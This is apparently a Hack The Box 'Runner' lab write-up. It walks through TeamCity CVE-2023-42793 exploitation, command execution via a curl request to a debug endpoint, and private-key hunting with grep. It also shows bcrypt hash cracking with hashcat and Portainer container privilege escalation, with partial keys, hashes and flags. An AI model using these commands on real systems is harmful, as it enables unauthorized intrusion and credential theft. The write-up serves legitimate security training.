HTB - Runner

Enumeration

---

Scope

Ip Address 10.10.11.13

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

* Open ports: 22 -80 - 8000
* UDP Open ports: None
* Services: ssh - http - http-alt

CVE-2023-42793:

GitHub - B4l3rI0n/CVE-2023-42793: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793GitHub

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb 
   
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]

Initial Access

---

To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.

Token

eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0

Get RCE

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"

StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)

I tried to search for files containing passwords, sensitive info or private keys and found one.

tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
xxxxxxxxxxxxxxxxxxxxxxxxBG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlk2rRhm7T2dg2z3+Y6ioSOVszvNlA4wRS4ty8qrGMSCpnZyEISPl
htHGpTu0oGI11FTun7HzQj7Ore7YMC+SsMIlS78MGU2ogb0Tp2bOY5RN1/X9MiK/SE4liT
njhPU1FqBIexmXKlgS/jv57WUtc5CsgTUGYkpaX6cT2geiNqHLnB5QD+ZKJWBflF6P9rTt
zkEdcWYKtDp0Phcu1FUVeQJOpb13w/L0GGiya2RkZgrIwXR6l3YCX+mBRFfhRFHLmd/lgy
/R2GQpBWUDB9rUS+mtHpm4c3786g11IPZo+74I7BhOn1Iz2E5KO0tW2jefylY2MrYgOjjq
5fj0Fz3eoj4hxtZyuf0GR8Cq1AkowJyDP02XzIvVZKCMDgVNAMH5B7COTX8CjUzc0vuKV5
iLSi+vRx6vYQpQv4wlh1H4hUlgaVSimoAqizJPUqyAi9oUhHXGY71x5gCUXeULZJMcDYKB
..snip..
-----END OPENSSH PRIVATE KEY-----

I'll Try to login to ssh with the one of the existing users and the private key

Success :)

john@runner:~$ cat user.txt 
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

---

Privilege Escalation

john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.11.13:80          10.10.16.31:55852       ESTABLISHED -
tcp        0      0 127.0.0.1:8111          127.0.0.1:39674         TIME_WAIT   -       

I'll try to map internal ports with ssh local port forwarding

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa

We got a web app

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT

http://localhost:9000

I knew I missed something so I returned to web app and found that I forgot to make a backup files and see what its content.

tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT

matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

s
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked

Login in http://localhost:9000 with these credentials

This article is very useful to understand the setup of container but was based on older verions of portainer:

Use Portainer for Privilege EscalationCyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis

Following the post:

Get the image id

Try to map host file system to the container with the following settings

device: /
o: bind
type: none

Create a container with the settings below

Finally, Access the console and get root access :)

Root flag: e5072defc9d08b4320325b1e16a6b83f